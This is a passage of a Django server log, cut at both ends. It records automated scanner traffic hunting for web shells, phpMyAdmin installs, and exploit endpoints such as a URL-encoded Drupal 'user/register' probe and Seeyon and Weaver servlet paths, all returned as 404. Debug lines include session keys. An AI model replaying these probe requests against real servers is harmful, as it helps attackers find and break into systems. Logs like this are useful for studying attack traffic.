HTTP/1.0" 404 6615 Not Found: /shh.php [06/Dec/2019 18:09:29] "POST /shh.php HTTP/1.0" 404 6615 Not Found: /ddd.php [06/Dec/2019 18:09:30] "POST /ddd.php HTTP/1.0" 404 6615 Not Found: /nnn.php [06/Dec/2019 18:09:30] "POST /nnn.php HTTP/1.0" 404 6615 Not Found: /ttt.php [06/Dec/2019 18:09:32] "POST /ttt.php HTTP/1.0" 404 6615 Not Found: /bbqq.php [06/Dec/2019 18:09:33] "POST /bbqq.php HTTP/1.0" 404 6618 Not Found: /tyrant.php [06/Dec/2019 18:09:33] "POST /tyrant.php HTTP/1.0" 404 6624 Not Found: /seeyon/htmlofficeservlet [06/Dec/2019 18:09:36] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.0" 404 6665 Not Found: /secure/ContactAdministrators!default.jspa [06/Dec/2019 18:09:37] "GET /secure/ContactAdministrators!default.jspa HTTP/1.0" 404 6716 Not Found: /weaver/bsh.servlet.BshServlet [06/Dec/2019 18:09:38] "GET /weaver/bsh.servlet.BshServlet HTTP/1.0" 404 6680 Not Found: /index.php [06/Dec/2019 18:09:40] "POST /index.php HTTP/1.0" 404 6621 Not Found: /user/register [06/Dec/2019 18:09:40] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.0" 404 6870 [06/Dec/2019 18:09:41] "GET / HTTP/1.0" 302 0 Not Found: /user.php [06/Dec/2019 18:09:41] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.0" 404 6618 Not Found: /index.php [06/Dec/2019 18:09:42] "GET /index.php HTTP/1.0" 404 6620 Not Found: /phpmyadmin/index.php [06/Dec/2019 18:09:42] "GET /phpmyadmin/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdmin/index.php [06/Dec/2019 18:09:42] "GET /phpMyAdmin/index.php HTTP/1.0" 404 6653 Not Found: /pmd/index.php [06/Dec/2019 18:09:44] "GET /pmd/index.php HTTP/1.0" 404 6632 Not Found: /pma/index.php [06/Dec/2019 18:09:45] "GET /pma/index.php HTTP/1.0" 404 6632 Not Found: /PMA/index.php [06/Dec/2019 18:09:45] "GET /PMA/index.php HTTP/1.0" 404 6632 Not Found: /PMA2/index.php [06/Dec/2019 18:09:46] "GET /PMA2/index.php HTTP/1.0" 404 6635 Not Found: /pmamy2/index.php [06/Dec/2019 18:09:48] "GET /pmamy2/index.php HTTP/1.0" 404 6641 Not Found: /mysql/index.php [06/Dec/2019 18:09:49] "GET /mysql/index.php HTTP/1.0" 404 6638 Not Found: /admin/index.php [06/Dec/2019 18:09:52] "GET /admin/index.php HTTP/1.0" 404 9245 Not Found: /db/index.php [06/Dec/2019 18:09:54] "GET /db/index.php HTTP/1.0" 404 6629 Not Found: /dbadmin/index.php [06/Dec/2019 18:09:54] "GET /dbadmin/index.php HTTP/1.0" 404 6644 Not Found: /web/phpMyAdmin/index.php [06/Dec/2019 18:09:55] "GET /web/phpMyAdmin/index.php HTTP/1.0" 404 6665 Not Found: /admin/pma/index.php [06/Dec/2019 18:09:56] "GET /admin/pma/index.php HTTP/1.0" 404 9257 Not Found: /admin/PMA/index.php [06/Dec/2019 18:09:58] "GET /admin/PMA/index.php HTTP/1.0" 404 9257 Not Found: /admin/mysql/index.php [06/Dec/2019 18:09:58] "GET /admin/mysql/index.php HTTP/1.0" 404 9263 Not Found: /admin/phpmyadmin/index.php [06/Dec/2019 18:10:00] "GET /admin/phpmyadmin/index.php HTTP/1.0" 404 9278 Not Found: /admin/phpmyadmin2/index.php [06/Dec/2019 18:10:04] "GET /admin/phpmyadmin2/index.php HTTP/1.0" 404 9281 [06/Dec/2019 18:10:05] "GET / HTTP/1.0" 302 0 Not Found: /mysqladmin/index.php [06/Dec/2019 18:10:06] "GET /mysqladmin/index.php HTTP/1.0" 404 6653 Not Found: /mysql-admin/index.php [06/Dec/2019 18:10:06] "GET /mysql-admin/index.php HTTP/1.0" 404 6656 Not Found: /phpadmin/index.php [06/Dec/2019 18:10:08] "GET /phpadmin/index.php HTTP/1.0" 404 6647 Not Found: /phpAdmin/index.php [06/Dec/2019 18:10:09] "GET /phpAdmin/index.php HTTP/1.0" 404 6647 Not Found: /phpmyadmin0/index.php [06/Dec/2019 18:10:10] "GET /phpmyadmin0/index.php HTTP/1.0" 404 6656 Not Found: /phpmyadmin2/index.php [06/Dec/2019 18:10:12] "GET /phpmyadmin2/index.php HTTP/1.0" 404 6656 Not Found: /phpMyAdmin-4.4.0/index.php [06/Dec/2019 18:10:12] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.0" 404 6671 Not Found: /phpMyAdmin4.8.0/index.php [06/Dec/2019 18:10:14] "GET /phpMyAdmin4.8.0/index.php HTTP/1.0" 404 6668 Not Found: /phpMyAdmin4.8.1/index.php [06/Dec/2019 18:10:14] "GET /phpMyAdmin4.8.1/index.php HTTP/1.0" 404 6668 Not Found: /phpMyAdmin4.8.3/index.php [06/Dec/2019 18:10:17] "GET /phpMyAdmin4.8.3/index.php HTTP/1.0" 404 6668 Not Found: /phpMyAdmin4.8.4/index.php [06/Dec/2019 18:10:17] "GET /phpMyAdmin4.8.4/index.php HTTP/1.0" 404 6668 Not Found: /phpMyAdmin4.8.5/index.php [06/Dec/2019 18:10:18] "GET /phpMyAdmin4.8.5/index.php HTTP/1.0" 404 6668 Not Found: /myadmin/index.php [06/Dec/2019 18:10:20] "GET /myadmin/index.php HTTP/1.0" 404 6644 Not Found: /myadmin2/index.php [06/Dec/2019 18:10:20] "GET /myadmin2/index.php HTTP/1.0" 404 6647 Not Found: /xampp/phpmyadmin/index.php [06/Dec/2019 18:10:21] "GET /xampp/phpmyadmin/index.php HTTP/1.0" 404 6671 Not Found: /phpMyadmin_bak/index.php [06/Dec/2019 18:10:21] "GET /phpMyadmin_bak/index.php HTTP/1.0" 404 6665 Not Found: /tools/phpMyAdmin/index.php [06/Dec/2019 18:10:24] "GET /tools/phpMyAdmin/index.php HTTP/1.0" 404 6671 Not Found: /phpmyadmin-old/index.php [06/Dec/2019 18:10:24] "GET /phpmyadmin-old/index.php HTTP/1.0" 404 6665 Not Found: /phpMyAdmin.old/index.php [06/Dec/2019 18:10:28] "GET /phpMyAdmin.old/index.php HTTP/1.0" 404 6665 Not Found: /pma-old/index.php [06/Dec/2019 18:10:28] "GET /pma-old/index.php HTTP/1.0" 404 6644 Not Found: /claroline/phpMyAdmin/index.php [06/Dec/2019 18:10:29] "GET /claroline/phpMyAdmin/index.php HTTP/1.0" 404 6683 Not Found: /typo3/phpmyadmin/index.php [06/Dec/2019 18:10:29] "GET /typo3/phpmyadmin/index.php HTTP/1.0" 404 6671 Not Found: /phpmyadmin/phpmyadmin/index.php [06/Dec/2019 18:10:32] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.0" 404 6686 Not Found: /phpMyAdmin/phpMyAdmin/index.php [06/Dec/2019 18:10:32] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.0" 404 6686 Not Found: /phpMyAbmin/index.php [06/Dec/2019 18:10:33] "GET /phpMyAbmin/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdmin__/index.php [06/Dec/2019 18:10:33] "GET /phpMyAdmin__/index.php HTTP/1.0" 404 6659 Not Found: /v/index.php [06/Dec/2019 18:10:42] "GET /v/index.php HTTP/1.0" 404 6626 Not Found: /phpmyadm1n/index.php [06/Dec/2019 18:10:45] "GET /phpmyadm1n/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdm1n/index.php [06/Dec/2019 18:10:46] "GET /phpMyAdm1n/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdmion/index.php [06/Dec/2019 18:10:53] "GET /phpMyAdmion/index.php HTTP/1.0" 404 6656 Not Found: /s/index.php [06/Dec/2019 18:10:54] "GET /s/index.php HTTP/1.0" 404 6626 Not Found: /MyAdmin/index.php [06/Dec/2019 18:10:54] "GET /MyAdmin/index.php HTTP/1.0" 404 6644 Not Found: /phpMyAdmin123/index.php [06/Dec/2019 18:10:56] "GET /phpMyAdmin123/index.php HTTP/1.0" 404 6662 Not Found: /pwd/index.php [06/Dec/2019 18:10:58] "GET /pwd/index.php HTTP/1.0" 404 6632 Not Found: /phpMyAdmina/index.php [06/Dec/2019 18:10:58] "GET /phpMyAdmina/index.php HTTP/1.0" 404 6656 Not Found: /phpMyAdmins/index.php [06/Dec/2019 18:11:01] "GET /phpMyAdmins/index.php HTTP/1.0" 404 6656 Not Found: /phpmyadmin2222/index.php [06/Dec/2019 18:11:08] "GET /phpmyadmin2222/index.php HTTP/1.0" 404 6665 Not Found: /phpMyAdmin333/index.php [06/Dec/2019 18:11:09] "GET /phpMyAdmin333/index.php HTTP/1.0" 404 6662 Not Found: /phpmyadmin3333/index.php [06/Dec/2019 18:11:10] "GET /phpmyadmin3333/index.php HTTP/1.0" 404 6665 Not Found: /php2MyAdmin/index.php [06/Dec/2019 18:11:10] "GET /php2MyAdmin/index.php HTTP/1.0" 404 6656 Not Found: /phpiMyAdmin/index.php [06/Dec/2019 18:11:11] "GET /phpiMyAdmin/index.php HTTP/1.0" 404 6656 Not Found: /phpNyAdmin/index.php [06/Dec/2019 18:11:18] "GET /phpNyAdmin/index.php HTTP/1.0" 404 6653 Not Found: /download/index.php [06/Dec/2019 18:11:20] "GET /download/index.php HTTP/1.0" 404 6647 Not Found: /phpMyAdmin_111/index.php [06/Dec/2019 18:11:20] "GET /phpMyAdmin_111/index.php HTTP/1.0" 404 6665 Not Found: /phpmadmin/index.php [06/Dec/2019 18:11:21] "GET /phpmadmin/index.php HTTP/1.0" 404 6650 Not Found: /321/index.php [06/Dec/2019 18:11:21] "GET /321/index.php HTTP/1.0" 404 6632 Not Found: /123131/index.php [06/Dec/2019 18:11:22] "GET /123131/index.php HTTP/1.0" 404 6641 Not Found: /phpMyAdminn/index.php [06/Dec/2019 18:11:22] "GET /phpMyAdminn/index.php HTTP/1.0" 404 6656 Not Found: /sbb/index.php [06/Dec/2019 18:11:24] "GET /sbb/index.php HTTP/1.0" 404 6632 Not Found: /phpMyAdmin_ai/index.php [06/Dec/2019 18:11:33] "GET /phpMyAdmin_ai/index.php HTTP/1.0" 404 6662 Not Found: /__phpMyAdmin/index.php [06/Dec/2019 18:11:38] "GET /__phpMyAdmin/index.php HTTP/1.0" 404 6659 Not Found: /program/index.php [06/Dec/2019 18:11:42] "GET /program/index.php HTTP/1.0" 404 6644 Not Found: /shopdb/index.php [06/Dec/2019 18:11:44] "GET /shopdb/index.php HTTP/1.0" 404 6641 Not Found: /phppma/index.php [06/Dec/2019 18:11:44] "GET /phppma/index.php HTTP/1.0" 404 6641 Not Found: /phpmy/index.php [06/Dec/2019 18:11:45] "GET /phpmy/index.php HTTP/1.0" 404 6638 Not Found: /mysql/admin/index.php [06/Dec/2019 18:11:45] "GET /mysql/admin/index.php HTTP/1.0" 404 6656 Not Found: /mysql/dbadmin/index.php [06/Dec/2019 18:11:46] "GET /mysql/dbadmin/index.php HTTP/1.0" 404 6662 Not Found: /mysql/mysqlmanager/index.php [06/Dec/2019 18:11:48] "GET /mysql/mysqlmanager/index.php HTTP/1.0" 404 6677 Not Found: /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php [06/Dec/2019 18:11:48] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.0" 404 6770 Not Found: /sql/index.php [06/Dec/2019 18:11:52] "GET /sql/index.php HTTP/1.0" 404 6632 Not Found: /SQL/index.php [06/Dec/2019 18:11:52] "GET /SQL/index.php HTTP/1.0" 404 6632 Not Found: /websql/index.php [06/Dec/2019 18:11:53] "GET /websql/index.php HTTP/1.0" 404 6641 Not Found: /MySQLAdmin/index.php [06/Dec/2019 18:11:53] "GET /MySQLAdmin/index.php HTTP/1.0" 404 6653 Not Found: /manager/html [06/Dec/2019 18:11:54] "GET /manager/html HTTP/1.0" 404 6629 [06/Dec/2019 18:14:54] "GET / HTTP/1.0" 302 0 [06/Dec/2019 18:15:08] "GET / HTTP/1.0" 302 0 [06/Dec/2019 18:22:07] "GET / HTTP/1.0" 302 0 [06/Dec/2019 18:27:09] "GET / HTTP/1.0" 302 0 [06/Dec/2019 18:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Dec/2019 18:32:12] "GET / HTTP/1.0" 302 0 [06/Dec/2019 18:37:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 18:42:40] "GET / HTTP/1.0" 302 0 [06/Dec/2019 18:47:43] "GET / HTTP/1.0" 302 0 [06/Dec/2019 18:52:45] "GET / HTTP/1.0" 302 0 [06/Dec/2019 19:00:02] "GET / HTTP/1.0" 302 0 [06/Dec/2019 19:04:29] "GET / HTTP/1.0" 302 0 [06/Dec/2019 19:06:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 19:06:05,827 utils 32196 139885071562496 (0.031) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'qe5o2w5hrgkyxtfq59mstpywqxi53y20' LIMIT 1; args=('qe5o2w5hrgkyxtfq59mstpywqxi53y20',) DEBUG 2019-12-06 19:06:05,830 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('qe5o2w5hrgkyxtfq59mstpywqxi53y20', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-20T19:06:05.828429+00:00'::timestamptz); args=('qe5o2w5hrgkyxtfq59mstpywqxi53y20', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 19, 6, 5, 828429, tzinfo=)) [06/Dec/2019 19:06:05] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Dec/2019 19:06:20] "GET / HTTP/1.0" 302 0 [06/Dec/2019 19:12:47] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [06/Dec/2019 19:14:40] "GET /proxy.php HTTP/1.0" 404 6629 [06/Dec/2019 19:19:12] "GET / HTTP/1.0" 302 0 [06/Dec/2019 19:25:42] "GET / HTTP/1.0" 302 0 [06/Dec/2019 19:30:45] "GET / HTTP/1.0" 302 0 [06/Dec/2019 19:37:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 19:42:40] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [06/Dec/2019 19:42:51] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [06/Dec/2019 19:42:53] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=101 HTTP/1.0" 404 6705 Not Found: /newslist.asp [06/Dec/2019 19:42:55] "GET /newslist.asp?type=4&id=1288 HTTP/1.0" 404 6649 [06/Dec/2019 19:47:43] "GET / HTTP/1.0" 302 0 [06/Dec/2019 19:52:46] "GET / HTTP/1.0" 302 0 [06/Dec/2019 19:53:19] "GET / HTTP/1.0" 302 0 [06/Dec/2019 19:55:18] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 19:55:19,339 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'co8ivk7xnt6o1o3zyl5tip41d0q0l6zu' LIMIT 1; args=('co8ivk7xnt6o1o3zyl5tip41d0q0l6zu',) DEBUG 2019-12-06 19:55:19,342 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('co8ivk7xnt6o1o3zyl5tip41d0q0l6zu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-20T19:55:19.340412+00:00'::timestamptz); args=('co8ivk7xnt6o1o3zyl5tip41d0q0l6zu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 19, 55, 19, 340412, tzinfo=)) [06/Dec/2019 19:55:19] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Dec/2019 19:57:49] "GET / HTTP/1.0" 302 0 [06/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [06/Dec/2019 20:06:48] "GET /proxy.php HTTP/1.0" 404 6627 [06/Dec/2019 20:10:05] "GET / HTTP/1.0" 302 0 [06/Dec/2019 20:18:20] "GET / HTTP/1.0" 302 0 [06/Dec/2019 20:19:11] "GET / HTTP/1.0" 302 0 [06/Dec/2019 20:25:08] "GET / HTTP/1.0" 302 0 [06/Dec/2019 20:30:11] "GET / HTTP/1.0" 302 0 [06/Dec/2019 20:37:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 20:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Dec/2019 20:42:40] "GET / HTTP/1.0" 302 0 [06/Dec/2019 20:48:27] "GET / HTTP/1.0" 302 0 [06/Dec/2019 20:53:30] "GET / HTTP/1.0" 302 0 [06/Dec/2019 20:58:33] "GET / HTTP/1.0" 302 0 [06/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [06/Dec/2019 21:08:53] "GET / HTTP/1.0" 302 0 [06/Dec/2019 21:12:41] "GET / HTTP/1.0" 302 0 [06/Dec/2019 21:18:24] "GET / HTTP/1.0" 302 0 [06/Dec/2019 21:23:39] "GET / HTTP/1.0" 302 0 [06/Dec/2019 21:29:18] "GET / HTTP/1.0" 302 0 [06/Dec/2019 21:34:26] "GET / HTTP/1.0" 302 0 [06/Dec/2019 21:40:04] "GET / HTTP/1.0" 302 0 [06/Dec/2019 21:45:14] "GET / HTTP/1.0" 302 0 [06/Dec/2019 21:50:36] "GET / HTTP/1.0" 302 0 [06/Dec/2019 21:54:24] "GET / HTTP/1.0" 302 0 [06/Dec/2019 21:55:53] "GET / HTTP/1.0" 302 0 [06/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 [06/Dec/2019 22:10:05] "GET / HTTP/1.0" 302 0 [06/Dec/2019 22:15:41] "GET / HTTP/1.0" 302 0 [06/Dec/2019 22:20:44] "GET / HTTP/1.0" 302 0 [06/Dec/2019 22:25:47] "GET / HTTP/1.0" 302 0 [06/Dec/2019 22:30:50] "GET / HTTP/1.0" 302 0 [06/Dec/2019 22:37:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 22:42:40] "GET / HTTP/1.0" 302 0 [06/Dec/2019 22:47:43] "GET / HTTP/1.0" 302 0 [06/Dec/2019 22:52:45] "GET / HTTP/1.0" 302 0 [06/Dec/2019 22:57:48] "GET / HTTP/1.0" 302 0 [06/Dec/2019 23:03:21] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 23:03:21,459 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'nbzjsfvjjpikr6hn3q9smth3srk0u7h7' LIMIT 1; args=('nbzjsfvjjpikr6hn3q9smth3srk0u7h7',) DEBUG 2019-12-06 23:03:21,461 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('nbzjsfvjjpikr6hn3q9smth3srk0u7h7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-20T23:03:21.459972+00:00'::timestamptz); args=('nbzjsfvjjpikr6hn3q9smth3srk0u7h7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 23, 3, 21, 459972, tzinfo=)) [06/Dec/2019 23:03:21] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Dec/2019 23:03:21] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [06/Dec/2019 23:03:21] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [06/Dec/2019 23:03:21] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 Not Found: /favicon.ico [06/Dec/2019 23:03:21] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [06/Dec/2019 23:03:21] "GET /favicon.ico HTTP/1.0" 404 6627 [06/Dec/2019 23:03:21] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [06/Dec/2019 23:03:21] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 Not Found: /_cat/indices [06/Dec/2019 23:03:53] "GET /_cat/indices HTTP/1.0" 404 6629 [06/Dec/2019 23:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Dec/2019 23:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 23:09:43,999 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T23:09:43.983161+00:00'::timestamptz AND "django_session"."session_key" = 'nbzjsfvjjpikr6hn3q9smth3srk0u7h7'); args=(datetime.datetime(2019, 12, 6, 23, 9, 43, 983161, tzinfo=), 'nbzjsfvjjpikr6hn3q9smth3srk0u7h7') [06/Dec/2019 23:09:44] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 23:09:44,127 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T23:09:44.112051+00:00'::timestamptz AND "django_session"."session_key" = 'nbzjsfvjjpikr6hn3q9smth3srk0u7h7'); args=(datetime.datetime(2019, 12, 6, 23, 9, 44, 112051, tzinfo=), 'nbzjsfvjjpikr6hn3q9smth3srk0u7h7') DEBUG 2019-12-06 23:09:44,171 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-20T23:09:44.168922+00:00'::timestamptz WHERE "django_session"."session_key" = 'nbzjsfvjjpikr6hn3q9smth3srk0u7h7'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 23, 9, 44, 168922, tzinfo=), 'nbzjsfvjjpikr6hn3q9smth3srk0u7h7') [06/Dec/2019 23:09:44] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Dec/2019 23:10:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 23:10:37,929 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T23:10:37.916489+00:00'::timestamptz AND "django_session"."session_key" = 'nbzjsfvjjpikr6hn3q9smth3srk0u7h7'); args=(datetime.datetime(2019, 12, 6, 23, 10, 37, 916489, tzinfo=), 'nbzjsfvjjpikr6hn3q9smth3srk0u7h7') [06/Dec/2019 23:10:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 23:10:38,034 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T23:10:38.024309+00:00'::timestamptz AND "django_session"."session_key" = 'nbzjsfvjjpikr6hn3q9smth3srk0u7h7'); args=(datetime.datetime(2019, 12, 6, 23, 10, 38, 24309, tzinfo=), 'nbzjsfvjjpikr6hn3q9smth3srk0u7h7') DEBUG 2019-12-06 23:10:38,061 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-20T23:10:38.059595+00:00'::timestamptz WHERE "django_session"."session_key" = 'nbzjsfvjjpikr6hn3q9smth3srk0u7h7'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 23, 10, 38, 59595, tzinfo=), 'nbzjsfvjjpikr6hn3q9smth3srk0u7h7') [06/Dec/2019 23:10:38] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Dec/2019 23:15:08] "GET / HTTP/1.0" 302 0 [06/Dec/2019 23:20:10] "GET / HTTP/1.0" 302 0 [06/Dec/2019 23:25:13] "GET / HTTP/1.0" 302 0 [06/Dec/2019 23:30:15] "GET / HTTP/1.0" 302 0 [06/Dec/2019 23:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Dec/2019 23:39:59] "GET / HTTP/1.0" 302 0 [06/Dec/2019 23:45:02] "GET / HTTP/1.0" 302 0 [06/Dec/2019 23:49:54] "GET / HTTP/1.0" 302 0 [06/Dec/2019 23:53:47] "GET / HTTP/1.0" 302 0 [06/Dec/2019 23:59:05] "GET / HTTP/1.0" 302 0 [07/Dec/2019 00:05:02] "GET / HTTP/1.0" 302 0 [07/Dec/2019 00:11:32] "GET / HTTP/1.0" 302 0 [07/Dec/2019 00:16:18] "GET / HTTP/1.0" 302 0 [07/Dec/2019 00:16:34] "GET / HTTP/1.0" 302 0 [07/Dec/2019 00:21:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 00:25:18] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 00:25:19,460 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6ny66yxjlwvzs1tg4dyah0vbe5djhbhn' LIMIT 1; args=('6ny66yxjlwvzs1tg4dyah0vbe5djhbhn',) DEBUG 2019-12-07 00:25:19,462 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6ny66yxjlwvzs1tg4dyah0vbe5djhbhn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T00:25:19.460627+00:00'::timestamptz); args=('6ny66yxjlwvzs1tg4dyah0vbe5djhbhn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 0, 25, 19, 460627, tzinfo=)) [07/Dec/2019 00:25:19] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 00:26:40] "GET / HTTP/1.0" 302 0 [07/Dec/2019 00:31:42] "GET / HTTP/1.0" 302 0 [07/Dec/2019 00:37:14] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [07/Dec/2019 00:37:15] "GET /robots.txt HTTP/1.0" 404 6623 Not Found: /Adminb5512046/Login.php [07/Dec/2019 00:37:15] "POST /Adminb5512046/Login.php HTTP/1.0" 404 6663 [07/Dec/2019 00:37:15] "GET / HTTP/1.0" 302 0 Not Found: /l.php [07/Dec/2019 00:37:16] "GET /l.php HTTP/1.0" 404 6608 Not Found: /test.php [07/Dec/2019 00:37:19] "GET /test.php HTTP/1.0" 404 6617 Not Found: /index.php [07/Dec/2019 00:37:20] "POST /index.php HTTP/1.0" 404 6621 Not Found: /forum.php [07/Dec/2019 00:37:22] "POST /forum.php HTTP/1.0" 404 6621 Not Found: /forums.php [07/Dec/2019 00:37:23] "POST /forums.php HTTP/1.0" 404 6624 Not Found: /bbs/index.php [07/Dec/2019 00:37:23] "POST /bbs/index.php HTTP/1.0" 404 6633 Not Found: /forum/index.php [07/Dec/2019 00:37:23] "POST /forum/index.php HTTP/1.0" 404 6639 Not Found: /forums/index.php [07/Dec/2019 00:37:24] "POST /forums/index.php HTTP/1.0" 404 6642 DEBUG 2019-12-07 00:37:25,269 utils 32196 139885061072640 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav'; args=('webdav',) Not Found: /webdav/ [07/Dec/2019 00:37:25] "GET /webdav/ HTTP/1.0" 404 1728 Not Found: /help.php [07/Dec/2019 00:37:26] "GET /help.php HTTP/1.0" 404 6617 Not Found: /java.php [07/Dec/2019 00:37:27] "GET /java.php HTTP/1.0" 404 6617 Not Found: /_query.php [07/Dec/2019 00:37:27] "GET /_query.php HTTP/1.0" 404 6623 Not Found: /test.php [07/Dec/2019 00:37:28] "GET /test.php HTTP/1.0" 404 6617 Not Found: /db_pma.php [07/Dec/2019 00:37:30] "GET /db_pma.php HTTP/1.0" 404 6623 Not Found: /logon.php [07/Dec/2019 00:37:31] "GET /logon.php HTTP/1.0" 404 6620 Not Found: /help-e.php [07/Dec/2019 00:37:31] "GET /help-e.php HTTP/1.0" 404 6623 Not Found: /license.php [07/Dec/2019 00:37:32] "GET /license.php HTTP/1.0" 404 6626 Not Found: /hell.php [07/Dec/2019 00:37:34] "GET /hell.php HTTP/1.0" 404 6617 Not Found: /pmd_online.php [07/Dec/2019 00:37:35] "GET 